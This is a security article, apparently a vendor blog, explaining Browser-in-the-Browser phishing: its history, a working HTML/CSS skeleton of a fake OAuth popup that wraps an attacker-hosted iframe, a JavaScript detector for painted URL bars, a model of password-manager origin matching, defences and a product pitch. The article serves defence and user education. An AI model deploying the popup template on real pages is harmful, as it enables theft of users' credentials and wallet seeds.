What BitB actually shows you
You land on a page that wants you to sign in with a third-party identity provider (Google, Microsoft, Apple, Steam, WalletConnect). You click "Sign in." A window appears with rounded corners, darkened backdrop, gradient title bar, three traffic-light buttons, a URL bar reading accounts.google.com/signin, and a credential form. It looks identical to the OAuth popup your browser has shown you a thousand times. It is not a popup. It is a <div> drawn inside the phishing page, styled with CSS to imitate browser chrome, wrapping an <iframe> that points to an attacker-controlled credential harvester. The URL bar is a static string. It cannot navigate. It is paint.
Why this was unknown before 2022
mr.d0x first publicly disclosed the technique in a write-up titled "Browser In The Browser (BITB) Attack" in March 2022, with a working PoC on GitHub. Before that, the prevailing assumption among defenders and red teamers was that browser window chrome was a boundary a page could not draw over. Google and Microsoft sign-in flows commonly open in a popup window, and the popup felt safer: its URL bar was real, and a user could verify the domain before typing a password. Phishing pages could fake the login form by redirecting the tab, but not the popup itself, because the popup was not inside their DOM.
mr.d0x showed the popup did not need to be a popup. If a phishing page draws something that looks like a popup with enough fidelity, the entire mental model collapses. Group-IB published an analysis in 2022 documenting BitB used against Steam credentials, and BleepingComputer covered the same family of attacks through 2022 to 2024. No browser bug, no zero-day, no CVE. It required only that users trust the visual appearance of an OAuth popup more than they trust the URL bar of the parent page.
The HTML/CSS recipe
The fake window is built from three pieces: a backdrop that dims the page behind, a window container with rounded corners and a shadow, and a title bar imitating browser chrome. The stripped-down skeleton:
<!-- Backdrop: dims the real page so the fake window reads as a modal dialog -->
<div class="bitb-backdrop">
  <!-- "Window": rounded corners, drop shadow, children clipped to its box -->
  <div class="bitb-window">
    <!-- Painted browser chrome: traffic lights plus a URL bar that is only text -->
    <div class="bitb-titlebar">
      <span class="dot red"></span>
      <span class="dot yellow"></span>
      <span class="dot green"></span>
      <div class="bitb-urlbar">accounts.google.com/signin</div>
    </div>
    <!-- The real content: a credential form served from an attacker-controlled origin -->
    <iframe src="https://attacker.example/fake-google-login"></iframe>
  </div>
</div>
And the CSS that turns those div tags into something that looks like a window:
/* Full-viewport overlay: dims the page behind and centres the fake window */
.bitb-backdrop {
  position: fixed;
  inset: 0;
  background: rgba(0,0,0,0.5);
  display: flex;
  align-items: center;
  justify-content: center;
}
/* The "window": same proportions and shadow as a real OS popup */
.bitb-window {
  width: 480px;
  background: #fff;
  border-radius: 8px;
  box-shadow: 0 20px 60px rgba(0,0,0,0.4);
  overflow: hidden;
}
/* Title bar imitating macOS-style browser chrome */
.bitb-titlebar {
  height: 36px;
  background: linear-gradient(#e8e8e8, #d4d4d4);
  display: flex;
  align-items: center;
  padding: 0 12px;
}
/* The "URL bar": a rounded text box with nothing behind it */
.bitb-urlbar {
  background: #f1f3f4;
  border-radius: 12px;
  padding: 4px 12px;
  margin-left: 16px;
  font: 12px sans-serif;
}
/* Traffic-light buttons */
.dot { width: 12px; height: 12px; border-radius: 50%; margin-right: 6px; }
.dot.red { background: #ff5f56; }
.dot.yellow { background: #ffbd2e; }
.dot.green { background: #27c93f; }
/* The harvester fills the window below the title bar; no border, so it reads as page content */
.bitb-window iframe { display: block; width: 100%; height: 520px; border: 0; }
That is the entire trick. The URL bar is a div containing the literal text accounts.google.com/signin. Clicking it does nothing. The window cannot be moved outside the parent browser window, because it is a div inside that window, not a separate OS object; an attacker can make the div draggable within the page so it feels like a window, but it still stops at the viewport edge. That is the simplest tell, and most users do not test for it.
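The painted URL bar leaves a trace a scanner can look for: a brand login hostname that appears in the page's visible text but matches neither the page's real origin nor the origin of any iframe it embeds. The script below, added here as an example and not code from the original page or from the mr.d0x PoC, runs that heuristic over the skeleton above. The brand host list and both sample pages are constructed for the demo, and the regex-based HTML handling stands in for a real DOM walk.

```javascript
// Added example for this article (not code from the original page or from the
// mr.d0x PoC). It implements the brand-on-wrong-origin heuristic the text
// describes: hostnames the page paints as text vs. the origins it really has.
// Regex parsing is enough for the skeleton above; a real scanner walks the DOM.
// The brand list and the sample pages are constructed for the demo.

// Brand SSO hosts a BitB page is likely to paint (constructed list, not exhaustive).
const BRAND_SSO_HOSTS = new Set([
  'accounts.google.com',
  'login.microsoftonline.com',
  'appleid.apple.com',
  'steamcommunity.com',
]);

// Something that looks like "host.tld", optionally followed by a path.
const HOST_RE = /\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)(\/[^\s<"']*)?/gi;

// Hostnames of every iframe the page embeds: the only places a real login
// form inside this page could actually be served from.
function iframeHosts(html) {
  const hosts = new Set();
  for (const m of html.matchAll(/<iframe\b[^>]*\ssrc=["']([^"']+)["']/gi)) {
    try {
      hosts.add(new URL(m[1]).hostname);
    } catch {
      // relative or malformed src: it belongs to the page's own origin anyway
    }
  }
  return hosts;
}

// Text a user can see: tags, scripts and stylesheets stripped.
function visibleText(html) {
  return html
    .replace(/<script\b[\s\S]*?<\/script>/gi, ' ')
    .replace(/<style\b[\s\S]*?<\/style>/gi, ' ')
    .replace(/<[^>]+>/g, ' ');
}

// One finding per brand SSO hostname that is painted in the visible text but
// is neither the page's own host nor the host of any iframe it embeds.
function findPaintedUrlBars(html, pageUrl) {
  const realHosts = new Set([new URL(pageUrl).hostname, ...iframeHosts(html)]);
  const findings = [];
  for (const m of visibleText(html).matchAll(HOST_RE)) {
    const host = m[1].toLowerCase();
    if (BRAND_SSO_HOSTS.has(host) && !realHosts.has(host)) {
      findings.push({ painted: m[0], host, realHosts: [...realHosts] });
    }
  }
  return findings;
}

// Constructed sample: the skeleton from this article, served from a lookalike domain.
const BITB_PAGE = `
<div class="bitb-backdrop"><div class="bitb-window">
  <div class="bitb-titlebar">
    <span class="dot red"></span><span class="dot yellow"></span><span class="dot green"></span>
    <div class="bitb-urlbar">accounts.google.com/signin</div>
  </div>
  <iframe src="https://attacker.example/fake-google-login"></iframe>
</div></div>`;

// Constructed control: a page that merely links to Google sign-in paints no hostname.
const HONEST_PAGE = `<p><a href="https://accounts.google.com/signin">Sign in with Google</a></p>`;

function scanDemo() {
  return {
    bitb: findPaintedUrlBars(BITB_PAGE, 'https://g00gle-signin.cc/shared-doc'),
    honest: findPaintedUrlBars(HONEST_PAGE, 'https://blog.example/post'),
  };
}

console.log(JSON.stringify(scanDemo(), null, 2));
```

Run it with node: the BitB sample yields one finding for accounts.google.com against the real hosts g00gle-signin.cc and attacker.example, and the control yields none. A page that merely mentions accounts.google.com in prose, like this article, would also trip it, which is why a production brand detector scores such signals alongside domain age and form targets rather than blocking on one.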
Where you encounter BitB
Crypto wallet-connect flows
The most lucrative BitB target in 2024 and 2025 is the wallet-connect flow on fake DeFi pages. A user lands on a Uniswap or Aerodrome clone, clicks "Connect Wallet," and a fake WalletConnect popup appears with wallet icons, QR code, and an "Approve" button. The fake popup either harvests a seed phrase typed into it or steers the user into approving a drainer transaction in their real wallet.
SSO logins on fake SaaS pages
Phishing pages imitating Notion, Figma, Salesforce, or Slack include a "Sign in with Google" or "Sign in with Microsoft" button. Clicking it opens a BitB popup that captures corporate credentials. Campaigns target employees of a specific company via a spear-phishing email linking to a fake "shared document."
Game "Login with Steam" phishing
Steam credentials are valuable because of skin and item trading markets that move tens of millions of dollars per year. Fake skin-trading sites and item-giveaway sites have used BitB consistently since 2022. BleepingComputer documented multiple campaigns across 2022 to 2024.
Crypto DeFi airdrop claim pages
An airdrop claim site tells a user they qualify for a free token allocation. To claim, the user must "sign in" with their wallet via a popup asking for the seed phrase to "verify ownership." The popup is a BitB. The Chainalysis 2024 Crypto Crime Report flagged this as a meaningful share of airdrop-themed phishing losses.
Real verifiable examples 2022-2025
The original mr.d0x disclosure (March 2022) shipped a PoC repository with templated fake popups for Google, Microsoft, and Apple. Later in 2022, Group-IB documented BitB used against Steam credentials, and Zscaler published its own analysis of the technique. BleepingComputer covered subsequent waves through 2023 and 2024. By 2024, Chainalysis reported BitB-style wallet-connect lures as a recurring pattern in airdrop phishing, contributing to approval-based wallet theft estimated at hundreds of millions of dollars in 2024 losses. The MDN window.open reference documents the legitimate popup behavior that BitB imitates.
The 2-second test that defeats BitB
Try to drag the popup outside the parent browser window. A real OS popup is a separate window object: you can pull it onto a second monitor or just off the top edge of the current window. A BitB fake is a div inside the page. Attackers often make that div draggable so it feels like a window, but the moment you drag it past the edge of the browser viewport, it stops. That is the entire test. Two seconds, no tools, and it works on every desktop BitB variant, because DOM elements cannot escape the document. The one place it does not apply is mobile, where browsers open sign-in flows as full-screen tabs rather than movable windows, so there is nothing to drag in the first place.
The downside is that it requires the user to remember to perform it. Conditioning users to drag every OAuth popup is not realistic at population scale. The real defense has to work without the user thinking about it.
Why password managers are the strongest defense
1Password, Bitwarden, Apple Passwords, Google Password Manager, and Dashlane bind saved credentials to the origin where they were captured, or at most to its registrable domain, depending on the matching rule configured. A Google credential is bound to accounts.google.com. A Microsoft credential is bound to login.microsoftonline.com. The manager autofills only if the real origin of the page matches.
A BitB popup lives inside a phishing page hosted on an attacker domain like g00gle-signin.cc, with the form itself in an iframe on another attacker origin. When the user clicks into the email field, the manager checks the real origin of the document that owns that field, never the cosmetic URL drawn in the fake URL bar. Nothing autofills. The manager that has reliably autofilled their Google login for years just did not. That silence is the warning.
If the user types manually, the credential goes to the attacker. If the user pauses, the attack fails. The habit is simple: when autofill does not appear on a login you expect, stop. Close the tab and navigate from a bookmark.
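To make the origin check concrete, here is a small model of the lookup a manager performs before filling, written for this article and not taken from any password manager's code. It offers the two matching modes managers commonly expose, exact origin and registrable ("base") domain, and shows that neither fills on a BitB host, on the harvester's iframe origin, or on a lookalike hostname that merely begins with accounts.google.com. The vault entries, page URLs, the https-only rule and the two-entry stand-in for the Public Suffix List are constructed for the demo.

```javascript
// Added example for this article, not code from any password manager. It models
// the two origin-matching rules managers commonly offer: exact origin (scheme,
// host and port) and "base domain" (the registrable domain). Both decide on the
// document's real origin, never on the hostname painted in a fake URL bar.
// Vault entries, page URLs and the public-suffix shortcut are constructed.

const VAULT = [
  { origin: 'https://accounts.google.com', user: 'alice@gmail.com' },
  { origin: 'https://login.microsoftonline.com', user: 'alice@corp.example' },
];

// Crude stand-in for the Public Suffix List (assumption for the demo): enough
// to show that "base domain" matching is anchored at the registrable domain,
// not at a substring or a prefix of the hostname.
const MULTI_LABEL_SUFFIXES = new Set(['co.uk', 'com.au']);

function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().split('.');
  const lastTwo = labels.slice(-2).join('.');
  const n = MULTI_LABEL_SUFFIXES.has(lastTwo) ? 3 : 2;
  return labels.slice(-n).join('.');
}

// Does a vault entry apply to the document at pageUrl under the given rule?
function matches(entry, pageUrl, mode) {
  const page = new URL(pageUrl);
  const saved = new URL(entry.origin);
  // Demo assumption: a login saved over https is never offered over plain http.
  if (page.protocol !== 'https:') return false;
  if (mode === 'exact') return page.origin === saved.origin;
  return registrableDomain(page.hostname) === registrableDomain(saved.hostname);
}

function fillCandidates(vault, pageUrl, mode = 'exact') {
  return vault.filter((e) => matches(e, pageUrl, mode)).map((e) => e.user);
}

// Constructed URLs: the real popup, a BitB host, the harvester iframe, a
// lookalike that starts with the brand hostname, a genuine Google subdomain,
// and the real host over plain http.
const PAGES = {
  realPopup: 'https://accounts.google.com/signin/v2/identifier',
  bitbHost: 'https://g00gle-signin.cc/shared-doc',
  harvesterIframe: 'https://attacker.example/fake-google-login',
  lookalikeSubdomain: 'https://accounts.google.com.g00gle-signin.cc/signin',
  googleSubdomain: 'https://myaccount.google.com/',
  plainHttp: 'http://accounts.google.com/signin',
};

function autofillDemo(mode) {
  const out = {};
  for (const [name, url] of Object.entries(PAGES)) {
    out[name] = fillCandidates(VAULT, url, mode);
  }
  return out;
}

console.log('exact origin:', autofillDemo('exact'));
console.log('base domain: ', autofillDemo('base'));
```

Under the exact rule only realPopup fills; under the base-domain rule googleSubdomain fills as well, because myaccount.google.com and accounts.google.com share the registrable domain google.com. The lookalike accounts.google.com.g00gle-signin.cc fills under neither rule, since its registrable domain is g00gle-signin.cc. That is the property the article relies on: the decision keys on what the browser reports as the origin, and a painted string never enters it.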
How SafeBrowz fits in
BitB attacks survive only if the user reaches the page hosting the fake popup. The phishing domain is the weak link. SafeBrowz inspects every navigation against our brand-impersonation engine and a live blocklist. A page imitating Google or Microsoft SSO on a non-Google origin trips the brand detector. A wallet-connect lure on a freshly registered domain trips the short-lived crypto phishing heuristic. The page never loads, the fake popup never renders. Password managers remain the strongest single defense because they refuse to autofill the fake form, but SafeBrowz catches the page first. The SafeBrowz extension is free forever for phishing and brand impersonation blocking on Chrome, Firefox, and Edge.
FAQ
Can a BitB popup really not be moved outside the browser window?
Correct. A BitB popup is a DOM element, and DOM elements cannot exist outside the document. A real OS popup can be dragged onto a second monitor. Drag the popup off the top edge of the browser. If it stops at the edge, it is a BitB.
Does the URL bar in the BitB popup do anything?
No. It is static text in the page's HTML, styled with CSS to look like an address bar. Clicking does nothing. It exists purely so that glancing users see the expected domain.
Will my browser warn me about a BitB page?
Generally no. Google Safe Browsing and Microsoft SmartScreen block known phishing domains, but a freshly registered BitB host may not appear on those lists for hours.
Does HTTPS protect me from BitB?
No. A BitB phishing page is served over HTTPS with a valid certificate, typically from a free CA such as Let's Encrypt. The lock icon only says the connection to the attacker's server is encrypted; the page itself is the attack.
Is BitB the same as clickjacking or iframe overlay?
Related but different. Clickjacking layers an invisible frame of a legitimate site over decoy content so the user clicks a real control without knowing it. BitB draws a fake window around an iframe holding a credential form on an attacker origin. The distinctive element is the cosmetic browser chrome around the iframe.
How does BitB compare to tab nabbing or pastejacking?
Tab nabbing rewrites a forgotten tab. Pastejacking swaps clipboard contents. BitB draws a fake OAuth popup inside an active phishing page. All three exploit visual trust. See also Permit2 signature attacks and lookalike wallet drainers.